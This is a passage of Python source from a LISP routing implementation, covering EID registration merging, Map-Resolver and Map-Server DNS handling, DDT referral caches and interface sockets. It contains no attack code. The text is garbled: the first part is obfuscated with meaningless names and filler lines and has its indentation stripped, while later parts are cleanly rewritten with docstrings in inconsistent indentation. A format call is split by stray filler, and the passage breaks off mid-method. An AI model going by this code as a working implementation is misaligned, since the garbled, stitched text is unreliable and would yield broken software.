self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 30 - 30: i1IIi / ooOoO0o . ooOoO0o
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
def build_sort_key ( self ) :
i11II111IiIiI = lisp_cache ( )
O0ooOo , iII1 = i11II111IiIiI . build_key ( self . eid )
oOo0oOoOo0O = ""
if ( self . group . is_null ( ) == False ) :
iiii , oOo0oOoOo0O = i11II111IiIiI . build_key ( self . group )
oOo0oOoOo0O = "-" + oOo0oOoOo0O [ 0 : 12 ] + "-" + str ( iiii ) + "-" + oOo0oOoOo0O [ 12 : : ]
if 53 - 53: IiII / I1IiiI / i1IIi
iII1 = iII1 [ 0 : 12 ] + "-" + str ( O0ooOo ) + "-" + iII1 [ 12 : : ] + oOo0oOoOo0O
del ( i11II111IiIiI )
return ( iII1 )
if 49 - 49: i11iIiiIii % I1IiiI % I1Ii111 / I1ii11iIi11i - i11iIiiIii . i1IIi
if 84 - 84: i11iIiiIii
def merge_in_site_eid ( self , child ) :
OO0O0O = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
OO0O0O = self . merge_rles_in_site_eid ( )
if 51 - 51: Oo0Ooo + I1IiiI
if 63 - 63: I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
if 38 - 38: O0 % I1ii11iIi11i + O0
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 37 - 37: Oo0Ooo / I1IiiI
return ( OO0O0O )
if 23 - 23: II111iiii / iII111i
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
def copy_rloc_records ( self ) :
oO0iII1IIii1iii = [ ]
for IiIIIi in self . registered_rlocs :
oO0iII1IIii1iii . append ( copy . deepcopy ( IiIIIi ) )
if 98 - 98: II111iiii % I1Ii111
return ( oO0iII1IIii1iii )
if 64 - 64: I11i
if 26 - 26: ooOoO0o * I11i + OOooOOo * i1IIi
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for O0oiiii1i1i11I in self . individual_registrations . values ( ) :
if ( self . site_id != O0oiiii1i1i11I . site_id ) : continue
if ( O0oiiii1i1i11I . registered == False ) : continue
self . registered_rlocs += O0oiiii1i1i11I . copy_rloc_records ( )
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
if 88 - 88: oO0o * o0oOOo0O0Ooo
if 5 - 5: I11i - I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
if 91 - 91: i1IIi + Oo0Ooo - I1ii11iIi11i + I1ii11iIi11i * O0 / O0
oO0iII1IIii1iii = [ ]
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . rloc . is_null ( ) or len ( oO0iII1IIii1iii ) == 0 ) :
oO0iII1IIii1iii . append ( IiIIIi )
continue
if 78 - 78: OoooooooOO
for II1IIii1 in oO0iII1IIii1iii :
if ( II1IIii1 . rloc . is_null ( ) ) : continue
if ( IiIIIi . rloc . is_exact_match ( II1IIii1 . rloc ) ) : break
if 73 - 73: o0oOOo0O0Ooo + OoooooooOO - I1Ii111 . iIii1I11I1II1
if ( II1IIii1 == oO0iII1IIii1iii [ - 1 ] ) : oO0iII1IIii1iii . append ( IiIIIi )
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
self . registered_rlocs = oO0iII1IIii1iii
if 8 - 8: O0 - O0 % Ii1I
if 22 - 22: OoOoOO00
if 85 - 85: II111iiii - II111iiii
if 95 - 95: II111iiii + II111iiii + iII111i
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 38 - 38: OoO0O00 * Ii1I * O0 / I1IiiI
if 99 - 99: Oo0Ooo + ooOoO0o - I1ii11iIi11i + I1Ii111 + Ii1I * I1IiiI
 def merge_rles_in_site_eid ( self ) :
  """Merge the RLEs of all registered individual registrations into the
  first RLOC record of the merged registration.  Returns True when the
  set of RLE node addresses changed, else False."""
  if 68 - 68: OoO0O00
  if 79 - 79: Ii1I . IiII + OoOoOO00
  if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
  if 71 - 71: Ii1I + IiII
  # Snapshot the node addresses of the first RLOC record currently
  # carrying an RLE, so a change can be detected at the end.
  IiiI1I1iIii = { }
  for IiIIIi in self . registered_rlocs :
   if ( IiIIIi . rle == None ) : continue
   for Oo0000O00o0 in IiIIIi . rle . rle_nodes :
    O0o00o000oO = Oo0000O00o0 . address . print_address_no_iid ( )
    IiiI1I1iIii [ O0o00o000oO ] = Oo0000O00o0 . address
   if 79 - 79: Oo0Ooo % oO0o . oO0o . o0oOOo0O0Ooo + I1IiiI - I1ii11iIi11i
   break
  if 8 - 8: I1ii11iIi11i
  if 50 - 50: o0oOOo0O0Ooo - O0 - II111iiii + OOooOOo - OoOoOO00 + OoO0O00
  if 33 - 33: o0oOOo0O0Ooo % OoOoOO00 + iII111i
  if 54 - 54: OoO0O00
  if 18 - 18: I1Ii111 - Oo0Ooo
  # Rebuild the merged RLOC list from the individual registrations.
  self . merge_rlocs_in_site_eid ( )
  if 66 - 66: iII111i - IiII . I1Ii111
  if 29 - 29: I1Ii111 - Ii1I + O0 - oO0o - O0
  if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
  if 41 - 41: OOooOOo + Oo0Ooo % I1IiiI
  if 3 - 3: ooOoO0o * Ii1I
  if 29 - 29: OoooooooOO + OOooOOo
  if 68 - 68: O0 + IiII / iII111i - OoOoOO00
  if 5 - 5: I1IiiI * OoooooooOO - II111iiii
  # Keep the first RLOC record plus any record without an RLE; the other
  # RLE-bearing records are represented by the merged RLE built below.
  o00O = [ ]
  for IiIIIi in self . registered_rlocs :
   if ( self . registered_rlocs . index ( IiIIIi ) == 0 ) :
    o00O . append ( IiIIIi )
    continue
   if 68 - 68: iIii1I11I1II1 / II111iiii
   if ( IiIIIi . rle == None ) : o00O . append ( IiIIIi )
  if 47 - 47: i11iIiiIii . OOooOOo + I1Ii111 / I1ii11iIi11i . I1IiiI . I1Ii111
  self . registered_rlocs = o00O
  if 79 - 79: OoO0O00 / i11iIiiIii . IiII - I11i / iIii1I11I1II1
  if 81 - 81: Oo0Ooo . II111iiii + i11iIiiIii - OoOoOO00 * ooOoO0o
  if 25 - 25: Ii1I / Oo0Ooo
  if 79 - 79: o0oOOo0O0Ooo . i1IIi % I1ii11iIi11i % II111iiii . iIii1I11I1II1
  if 45 - 45: I1ii11iIi11i / iIii1I11I1II1 + OoO0O00 / O0 - O0 - I1Ii111
  if 88 - 88: o0oOOo0O0Ooo % I1Ii111
  if 4 - 4: i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
  # Build the merged RLE across every registered individual registration,
  # deduplicating node addresses; each node carries the rloc_name of the
  # registration it came from.
  OoO000oo000o0 = lisp_rle ( "" )
  o0Ooo00oooo = { }
  Ooo000oo0OO0 = None
  for O0oiiii1i1i11I in self . individual_registrations . values ( ) :
   if ( O0oiiii1i1i11I . registered == False ) : continue
   IiiiiIIii = O0oiiii1i1i11I . registered_rlocs [ 0 ] . rle
   if ( IiiiiIIii == None ) : continue
   if 59 - 59: Ii1I + iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / iIii1I11I1II1 - o0oOOo0O0Ooo
   Ooo000oo0OO0 = O0oiiii1i1i11I . registered_rlocs [ 0 ] . rloc_name
   for iIIiii1I11 in IiiiiIIii . rle_nodes :
    O0o00o000oO = iIIiii1I11 . address . print_address_no_iid ( )
    if ( o0Ooo00oooo . has_key ( O0o00o000oO ) ) : break
    if 14 - 14: IiII + I11i - o0oOOo0O0Ooo
    Oo0000O00o0 = lisp_rle_node ( )
    Oo0000O00o0 . address . copy_address ( iIIiii1I11 . address )
    Oo0000O00o0 . level = iIIiii1I11 . level
    Oo0000O00o0 . rloc_name = Ooo000oo0OO0
    OoO000oo000o0 . rle_nodes . append ( Oo0000O00o0 )
    o0Ooo00oooo [ O0o00o000oO ] = iIIiii1I11 . address
  if 100 - 100: ooOoO0o
  if 29 - 29: II111iiii % II111iiii - OoooooooOO * OoooooooOO
  if 54 - 54: iII111i / OoO0O00 . O0 * iII111i % OoOoOO00 % iIii1I11I1II1
  if 37 - 37: iII111i - ooOoO0o * Ii1I + II111iiii * i11iIiiIii
  if 8 - 8: OoooooooOO % I11i - iII111i * OOooOOo . O0
  if 40 - 40: I1Ii111 . oO0o + OoO0O00 % Oo0Ooo / II111iiii
  # Attach the merged RLE (None when empty) to the first merged record.
  if ( len ( OoO000oo000o0 . rle_nodes ) == 0 ) : OoO000oo000o0 = None
  if ( len ( self . registered_rlocs ) != 0 ) :
   self . registered_rlocs [ 0 ] . rle = OoO000oo000o0
   if ( Ooo000oo0OO0 ) : self . registered_rlocs [ 0 ] . rloc_name = None
  if 19 - 19: i11iIiiIii
  if 20 - 20: i11iIiiIii . II111iiii - I1ii11iIi11i / ooOoO0o % i11iIiiIii
  if 35 - 35: Oo0Ooo - I1ii11iIi11i . Oo0Ooo
  if 13 - 13: II111iiii / OoOoOO00 * iII111i % O0 % I1ii11iIi11i * i11iIiiIii
  if 92 - 92: i11iIiiIii + OoO0O00
  # No change when the before/after RLE address-key sets are identical.
  if ( IiiI1I1iIii . keys ( ) == o0Ooo00oooo . keys ( ) ) : return ( False )
  if 94 - 94: I1ii11iIi11i + OoO0O00 . II111iiii + oO0o . II111iiii
  lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# i11iIiiIii . Ii1I - ooOoO0o * iII111i - iII111i - i11iIiiIii
 IiiI1I1iIii . keys ( ) , o0Ooo00oooo . keys ( ) ) )
  if 6 - 6: I1ii11iIi11i / iIii1I11I1II1 / I11i % iIii1I11I1II1
  return ( True )
if 49 - 49: OOooOOo * iIii1I11I1II1 - iIii1I11I1II1
if 70 - 70: OoO0O00 % i11iIiiIii * IiII . I11i * Oo0Ooo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
oo0OO0O0 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( oo0OO0O0 == None ) :
oo0OO0O0 = lisp_site_eid ( self . site )
oo0OO0O0 . eid . copy_address ( self . group )
oo0OO0O0 . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , oo0OO0O0 )
if 17 - 17: i1IIi
if 29 - 29: OOooOOo % OoO0O00 + oO0o + o0oOOo0O0Ooo . iII111i
if 14 - 14: i1IIi + OoOoOO00 * oO0o - II111iiii + IiII + OoOoOO00
if 42 - 42: Oo0Ooo + iII111i * ooOoO0o
if 72 - 72: iIii1I11I1II1 % I1Ii111
oo0OO0O0 . parent_for_more_specifics = self . parent_for_more_specifics
if 77 - 77: I1Ii111 * I1IiiI / iIii1I11I1II1 . II111iiii * Oo0Ooo
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( oo0OO0O0 . group )
oo0OO0O0 . add_source_entry ( self )
if 71 - 71: ooOoO0o / iIii1I11I1II1 % O0 / I1ii11iIi11i . I1Ii111 / i11iIiiIii
if 6 - 6: oO0o . OoO0O00 - II111iiii . I1IiiI - o0oOOo0O0Ooo - i1IIi
if 42 - 42: Ii1I + i11iIiiIii
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
oo0OO0O0 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( oo0OO0O0 == None ) : return
if 46 - 46: O0 % OoOoOO00 - I1Ii111 . I1IiiI
O0oiiii1i1i11I = oo0OO0O0 . lookup_source_cache ( self . eid , True )
if ( O0oiiii1i1i11I == None ) : return
if 66 - 66: II111iiii * iIii1I11I1II1 * ooOoO0o * I11i . II111iiii - ooOoO0o
if ( oo0OO0O0 . source_cache == None ) : return
if 15 - 15: I1ii11iIi11i - i11iIiiIii - Ii1I / Ii1I . iII111i
oo0OO0O0 . source_cache . delete_cache ( self . eid )
if ( oo0OO0O0 . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if 70 - 70: O0 / II111iiii
def add_source_entry(self, source_se):
    """Store source_se in this (S,G) entry's source cache, keyed by its EID."""
    if self.source_cache == None:
        self.source_cache = lisp_cache()
    self.source_cache.add_cache(source_se.eid, source_se)
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
def lookup_source_cache(self, source, exact):
    """Return the source-cache entry for 'source', or None when no cache exists."""
    cache = self.source_cache
    if cache == None:
        return (None)
    return (cache.lookup_cache(source, exact))
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
def is_star_g(self):
    """True for a (*,G) entry: a group is present and the EID equals the group."""
    group = self.group
    if group.is_null():
        return (False)
    return (self.eid.is_exact_match(group))
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
def eid_record_matches(self, eid_record):
    """
    True when a received EID-record refers to this entry: EIDs must
    match exactly, and a group carried in the record must match this
    entry's group exactly.
    """
    if self.eid.is_exact_match(eid_record.eid) == False:
        return (False)
    if eid_record.group.is_null():
        return (True)
    return (eid_record.group.is_exact_match(self.group))
if 12 - 12: I1IiiI
if 99 - 99: II111iiii - OoOoOO00
def inherit_from_ams_parent(self):
    """
    Copy policy/configuration settings from the accept-more-specifics
    (AMS) parent entry onto this more-specific entry.  No-op when no
    parent is recorded.
    """
    parent = self.parent_for_more_specifics
    if parent == None:
        return
    for attr in ("force_proxy_reply", "force_nat_proxy_reply", "force_ttl",
                 "pitr_proxy_reply_drop", "proxy_reply_action",
                 "echo_nonce_capable", "policy", "require_signature"):
        setattr(self, attr, getattr(parent, attr))
if 22 - 22: i11iIiiIii * II111iiii
if 11 - 11: Oo0Ooo % i1IIi
def rtrs_in_rloc_set(self):
    """True when at least one registered RLOC is an RTR."""
    return (any(entry.is_rtr() for entry in self.registered_rlocs))
if 27 - 27: I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
def is_rtr_in_rloc_set(self, rtr_rloc):
    """True when 'rtr_rloc' appears in the registered RLOC-set as an RTR."""
    for entry in self.registered_rlocs:
        if entry.rloc.is_exact_match(rtr_rloc) == False:
            continue
        if entry.is_rtr():
            return (True)
    return (False)
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
if 8 - 8: OoooooooOO
def is_rloc_in_rloc_set(self, rloc):
    """
    True when 'rloc' appears in the registered RLOC-set, either as a
    top-level RLOC address or inside an entry's RLE node list.
    """
    for entry in self.registered_rlocs:
        if entry.rle:
            for rle_node in entry.rle.rle_nodes:
                if rle_node.address.is_exact_match(rloc):
                    return (True)
        if entry.rloc.is_exact_match(rloc):
            return (True)
    return (False)
if 50 - 50: iII111i . II111iiii % I1Ii111 % I1IiiI / o0oOOo0O0Ooo . I1IiiI
if 76 - 76: OOooOOo % iII111i
def do_rloc_sets_match(self, prev_rloc_set):
    """
    True when the registered RLOC-set equals prev_rloc_set: same
    cardinality and every previous RLOC still present in the set.
    """
    if len(self.registered_rlocs) != len(prev_rloc_set):
        return (False)

    for entry in prev_rloc_set:
        if self.is_rloc_in_rloc_set(entry.rloc) == False:
            return (False)
    return (True)
if 81 - 81: iII111i % OOooOOo * oO0o
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
class lisp_mr():
    """
    A configured Map-Resolver, specified by address or DNS name.  Each
    instance registers itself in the global lisp_map_resolvers_list,
    keyed by mr-name concatenated with the printed address.
    """

    def __init__(self, addr_str, dns_name, mr_name):
        # "all" is the wildcard name used when no mr-name is configured.
        self.mr_name = "all" if mr_name == None else mr_name
        self.dns_name = dns_name
        self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        # Which A-record from the DNS answer this instance tracks.
        self.a_record_index = 0
        if addr_str:
            self.map_resolver.store_address(addr_str)
            self.insert_mr()
        else:
            self.resolve_dns_name()

        # Map-Request statistics for RTT and liveness accounting.
        self.last_used = 0
        self.last_reply = 0
        self.last_nonce = 0
        self.map_requests_sent = 0
        self.neg_map_replies_received = 0
        self.total_rtt = 0

    def resolve_dns_name(self):
        """
        Re-resolve dns_name (at most every 30 seconds) and keep this
        entry in sync with the A-record it tracks.  For LISP-Decent DNS
        suffixes, the first entry also creates siblings for additional
        A-records and retires entries no longer in the DNS answer.
        """
        if self.dns_name == None:
            return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30):
            return

        try:
            answer = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = answer[2]
        except:
            # Lookup failed; keep current state and retry on a later call.
            return

        # Our A-record slot vanished from the answer -- retire this entry.
        if len(a_records) <= self.a_record_index:
            self.delete_mr()
            return

        # Re-key under the new address when our tracked record changed.
        addr_str = a_records[self.a_record_index]
        if addr_str != self.map_resolver.print_address_no_iid():
            self.delete_mr()
            self.map_resolver.store_address(addr_str)
            self.insert_mr()

        # Only the first entry of a LISP-Decent name manages siblings.
        if lisp_is_decent_dns_suffix(self.dns_name) == False:
            return
        if self.a_record_index != 0:
            return

        # Create entries for additional A-records we don't know about.
        for addr_str in a_records[1:]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            mr = lisp_get_map_resolver(address, None)
            if (mr != None and
                mr.a_record_index == a_records.index(addr_str)):
                continue

            mr = lisp_mr(addr_str, None, None)
            mr.a_record_index = a_records.index(addr_str)
            mr.dns_name = self.dns_name
            mr.last_dns_resolve = lisp_get_timestamp()

        # Retire same-name entries whose address left the DNS answer.
        stale = []
        for mr in lisp_map_resolvers_list.values():
            if self.dns_name != mr.dns_name:
                continue
            if mr.map_resolver.print_address_no_iid() in a_records:
                continue
            stale.append(mr)

        for mr in stale:
            mr.delete_mr()

    def insert_mr(self):
        """Register this entry in the global Map-Resolver table."""
        key = self.mr_name + self.map_resolver.print_address()
        lisp_map_resolvers_list[key] = self

    def delete_mr(self):
        """Unregister this entry from the global table, if present.

        NOTE(review): dict.has_key() is Python 2 only, matching the
        rest of this file.
        """
        key = self.mr_name + self.map_resolver.print_address()
        if lisp_map_resolvers_list.has_key(key) == False:
            return
        lisp_map_resolvers_list.pop(key)
if 52 - 52: OoooooooOO % OoOoOO00 / IiII % OoO0O00
if 36 - 36: II111iiii . O0 % O0 * iII111i * iIii1I11I1II1
if 42 - 42: iII111i . OOooOOo + oO0o / OoOoOO00
class lisp_ddt_root():
    """A configured DDT root node: its address plus selection attributes."""

    def __init__(self):
        self.public_key = ""
        self.priority = 0
        self.weight = 0
        self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
if 54 - 54: ooOoO0o % o0oOOo0O0Ooo + i11iIiiIii / ooOoO0o * II111iiii * Ii1I
if 52 - 52: ooOoO0o + IiII * OoOoOO00 - OoO0O00 - OoooooooOO - oO0o
if 60 - 60: iII111i / oO0o
class lisp_referral():
    """
    A DDT referral-cache entry: an EID (and optional group) prefix plus
    a set of lisp_referral_node children Map-Requests are referred to.
    """

    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_set = {}
        self.referral_type = LISP_DDT_ACTION_NULL
        self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.referral_ttl = 0
        self.uptime = lisp_get_timestamp()
        self.expires = 0
        # For (S,G) group entries: inner cache keyed by source EID.
        self.source_cache = None

    def print_referral(self, eid_indent, referral_indent):
        """Print this referral followed by each node in its referral set."""
        elapsed = lisp_print_elapsed(self.uptime)
        expires = lisp_print_future(self.expires)
        lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:".format(
            eid_indent, green(self.eid.print_prefix(), False), elapsed,
            expires, len(self.referral_set)))

        for node in self.referral_set.values():
            node.print_ref_node(referral_indent)

    def print_referral_type(self):
        """Return a short string naming this referral's action type."""
        if self.eid.afi == LISP_AFI_ULTIMATE_ROOT:
            return ("root")
        if self.referral_type == LISP_DDT_ACTION_NULL:
            return ("null-referral")
        if self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND:
            return ("no-site-action")
        if self.referral_type > LISP_DDT_ACTION_MAX:
            return ("invalid-action")
        return (lisp_map_referral_action_string[self.referral_type])

    def print_eid_tuple(self):
        """Return the printable (EID, group) tuple for this entry."""
        return (lisp_print_eid_tuple(self.eid, self.group))

    def print_ttl(self):
        """Return the referral TTL as a human-readable string."""
        ttl = self.referral_ttl
        if ttl < 60:
            return (str(ttl) + " secs")

        if (ttl % 60) == 0:
            ttl = str(ttl / 60) + " mins"
        else:
            ttl = str(ttl) + " secs"
        return (ttl)

    def is_referral_negative(self):
        """True for actions meaning the EID is not registered/delegated."""
        return (self.referral_type in (LISP_DDT_ACTION_MS_NOT_REG,
            LISP_DDT_ACTION_DELEGATION_HOLE, LISP_DDT_ACTION_NOT_AUTH))

    def add_cache(self):
        """Add this referral to the global cache (two-level for (S,G))."""
        if self.group.is_null():
            lisp_referral_cache.add_cache(self.eid, self)
            return

        group_entry = lisp_referral_cache.lookup_cache(self.group, True)
        if group_entry == None:
            group_entry = lisp_referral()
            group_entry.eid.copy_address(self.group)
            group_entry.group.copy_address(self.group)
            lisp_referral_cache.add_cache(self.group, group_entry)

        # A null source EID means (*,G); store it as the default route.
        if self.eid.is_null():
            self.eid.make_default_route(group_entry.group)
        group_entry.add_source_entry(self)

    def delete_cache(self):
        """Remove this referral; drop an emptied (S,G) group entry too."""
        if self.group.is_null():
            lisp_referral_cache.delete_cache(self.eid)
            return

        group_entry = lisp_referral_cache.lookup_cache(self.group, True)
        if group_entry == None:
            return
        if group_entry.lookup_source_cache(self.eid, True) == None:
            return

        group_entry.source_cache.delete_cache(self.eid)
        if group_entry.source_cache.cache_size() == 0:
            lisp_referral_cache.delete_cache(self.group)

    def add_source_entry(self, source_ref):
        """Store source_ref in this group entry's source cache."""
        if self.source_cache == None:
            self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ref.eid, source_ref)

    def lookup_source_cache(self, source, exact):
        """Look up 'source' in the source cache; None when absent."""
        if self.source_cache == None:
            return (None)
        return (self.source_cache.lookup_cache(source, exact))
if 59 - 59: IiII . OoO0O00 - OoooooooOO . O0
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
class lisp_referral_node():
    """One referral target (DDT node address) within a lisp_referral."""

    def __init__(self):
        self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.priority = 0
        self.weight = 0
        self.updown = True
        self.map_requests_sent = 0
        self.no_responses = 0
        self.uptime = lisp_get_timestamp()

    def print_ref_node(self, indent):
        """Print one line describing this referral node."""
        elapsed = lisp_print_elapsed(self.uptime)
        state = "up" if self.updown else "down"
        lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format(
            indent, red(self.referral_address.print_address(), False),
            elapsed, state, self.priority, self.weight))
if 79 - 79: O0 / II111iiii
if 39 - 39: IiII
if 79 - 79: iIii1I11I1II1 * oO0o . iIii1I11I1II1 * O0
class lisp_ms():
    """
    A configured Map-Server, specified by address or DNS name.
    Instances live in the global lisp_map_servers_list keyed by
    ms-name concatenated with the printed address.
    """

    def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
                 mr, rr, wmn, site_id, ekey_id, ekey):
        self.ms_name = "all" if ms_name == None else ms_name
        self.dns_name = dns_name
        self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.last_dns_resolve = None
        self.a_record_index = 0

        # All Map-Servers share one xtr-id; mint it for the first entry.
        # NOTE(review): .values()[0] relies on Python 2 dict semantics.
        if lisp_map_servers_list == {}:
            self.xtr_id = lisp_get_control_nonce()
        else:
            self.xtr_id = lisp_map_servers_list.values()[0].xtr_id

        self.alg_id = alg_id
        self.key_id = key_id
        self.password = pw
        self.proxy_reply = pr
        self.merge_registrations = mr
        self.refresh_registrations = rr
        self.want_map_notify = wmn
        self.site_id = site_id
        self.map_registers_sent = 0
        self.map_registers_multicast_sent = 0
        self.map_notifies_received = 0
        self.map_notify_acks_sent = 0
        self.ekey_id = ekey_id
        self.ekey = ekey
        if addr_str:
            self.map_server.store_address(addr_str)
            self.insert_ms()
        else:
            self.resolve_dns_name()

    def resolve_dns_name(self):
        """
        Re-resolve dns_name (at most every 30 seconds) and keep this
        entry in sync with the A-record it tracks.  For LISP-Decent DNS
        suffixes, the first entry clones itself for additional
        A-records and retires same-name entries that left the answer.
        """
        if self.dns_name == None:
            return
        if (self.last_dns_resolve and
            time.time() - self.last_dns_resolve < 30):
            return

        try:
            answer = socket.gethostbyname_ex(self.dns_name)
            self.last_dns_resolve = lisp_get_timestamp()
            a_records = answer[2]
        except:
            # Lookup failed; keep current state and retry later.
            return

        # Our A-record slot vanished from the answer -- retire this entry.
        if len(a_records) <= self.a_record_index:
            self.delete_ms()
            return

        # Re-key under the new address when our tracked record changed.
        addr_str = a_records[self.a_record_index]
        if addr_str != self.map_server.print_address_no_iid():
            self.delete_ms()
            self.map_server.store_address(addr_str)
            self.insert_ms()

        # Only the first entry of a LISP-Decent name manages siblings.
        if lisp_is_decent_dns_suffix(self.dns_name) == False:
            return
        if self.a_record_index != 0:
            return

        # Clone this entry for additional A-records we don't know about.
        for addr_str in a_records[1:]:
            address = lisp_address(LISP_AFI_NONE, addr_str, 0, 0)
            ms = lisp_get_map_server(address)
            if (ms != None and
                ms.a_record_index == a_records.index(addr_str)):
                continue

            ms = copy.deepcopy(self)
            ms.map_server.store_address(addr_str)
            ms.a_record_index = a_records.index(addr_str)
            ms.last_dns_resolve = lisp_get_timestamp()
            ms.insert_ms()

        # Retire same-name entries whose address left the DNS answer.
        stale = []
        for ms in lisp_map_servers_list.values():
            if self.dns_name != ms.dns_name:
                continue
            if ms.map_server.print_address_no_iid() in a_records:
                continue
            stale.append(ms)

        for ms in stale:
            ms.delete_ms()

    def insert_ms(self):
        """Register this entry in the global Map-Server table."""
        key = self.ms_name + self.map_server.print_address()
        lisp_map_servers_list[key] = self

    def delete_ms(self):
        """Unregister this entry from the global table, if present.

        NOTE(review): dict.has_key() is Python 2 only.
        """
        key = self.ms_name + self.map_server.print_address()
        if lisp_map_servers_list.has_key(key) == False:
            return
        lisp_map_servers_list.pop(key)
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
if 91 - 91: iII111i . OoooooooOO
if 90 - 90: i11iIiiIii - I1IiiI
class lisp_interface():
    """
    Per-device configuration and socket state for an interface LISP
    uses.  Instances register in the global lisp_myinterfaces table,
    keyed by device name.
    """

    def __init__(self, device):
        self.interface_name = ""
        self.device = device
        self.instance_id = None        # LISP instance-ID, None when unset
        self.bridge_socket = None      # PF_PACKET socket, see set_bridge_socket()
        self.raw_socket = None         # raw IP send socket, see set_socket()
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dynamic_eid_device = None
        self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def add_interface(self):
        """Register this interface in the global lisp_myinterfaces table."""
        lisp_myinterfaces[self.device] = self

    def get_instance_id(self):
        """Return the configured instance-ID (None when unset)."""
        return (self.instance_id)

    def get_socket(self):
        """Return the raw IP send socket (None until set_socket() succeeds)."""
        return (self.raw_socket)

    def get_bridge_socket(self):
        """Return the bridge socket (None until set_bridge_socket() succeeds)."""
        return (self.bridge_socket)

    def does_dynamic_eid_match(self, eid):
        """True when 'eid' falls inside this interface's dynamic-EID prefix."""
        if (self.dynamic_eid.is_null()): return (False)
        return (eid.is_more_specific(self.dynamic_eid))

    def set_socket(self, device):
        """
        Open a raw IPv4 socket bound to 'device' for sending pre-built
        IP headers.  On bind failure the socket is closed and
        raw_socket is left as None (best-effort, as before).
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
            socket.IPPROTO_RAW)
        sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        try:
